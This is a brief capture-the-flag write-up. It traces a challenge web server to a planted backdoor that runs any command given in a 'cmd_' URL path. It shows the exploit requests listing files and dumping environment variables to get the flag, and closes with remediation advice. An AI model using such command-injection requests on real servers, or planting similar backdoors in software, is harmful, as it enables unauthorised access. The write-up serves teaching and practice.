Notes:
Solution:
- Dockerfile shows xinitd.conf is used. Can simply be accessed with
xinitd.conf
- xinitd.conf references
/init.sh
- init.sh references
/webserver.sh
- webserver.sh has backdoor for paths starting with
cmd_
and runs any command after the underscore as current user. - Flag can be found in the environment variables.
http://diceprectf.meatctf.com:2182/cmd_ls
Dockerfile canvasBackground.js index.html init.sh main.css star.png stars.js webserver.sh xinetd.conf
http://diceprectf.meatctf.com:2182/cmd_env
SHELL=/bin/sh REMOTE_HOST=93.209.73.130 SUDO_GID=0 HOSTNAME=288e8c33244a SUDO_COMMAND=./webserver.sh SUDO_USER=root PWD=/app LOGNAME=pleb HOME=/root FLAG=flag{w3b53rv3r_b4ckd00r} TERM=unknown USER=pleb SHLVL=0 _STDBUF_E=0 _STDBUF_I=0 _STDBUF_O=0 PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin SUDO_UID=0 OLDPWD=/ _=/usr/bin/env
Flag
flag{w3b53rv3r_b4ckd00r}
Remediation:
- Do not implement backdoors. Not even if the source is not public.